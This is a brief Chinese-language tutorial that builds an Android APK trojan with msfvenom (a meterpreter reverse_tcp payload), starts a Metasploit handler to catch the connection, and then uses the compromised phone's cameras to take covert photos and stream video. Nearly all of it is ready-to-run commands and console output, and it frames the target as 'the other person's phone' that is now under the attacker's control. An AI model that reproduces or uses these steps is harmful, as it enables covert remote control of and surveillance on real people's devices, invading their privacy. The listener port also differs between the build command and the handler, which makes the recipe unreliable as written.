环境:kali Linux
开启msf: msfconsole
生成apk木马:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=5555 R > /root/test.apk
'''
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.1.192
LHOST => 192.168.1.192
msf exploit(handler) > set LPORT 55555
LPORT => 55555
msf exploit(handler) > exploit
[] Started reverse TCP handler on 192.168.1.192:55555
[] Starting the payload handler...
command:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.192#本机ip
set LPORT 55555#监听端口
exploit #开始利用接收会话
<pre>
我们可以在我们的MSF里看见有一个会话连接了
这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo
webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头
webcam_snap 隐秘拍照功能
后边跟上参数-i 指定使用那个摄像头拍照
可以看见我们分别对前后摄像头都拍了照 保存到了桌面上
还可以输入命令 webcam_stream 开启摄像头
总结:
1.用msf生成apk木马
2.配置并开启监听接收会话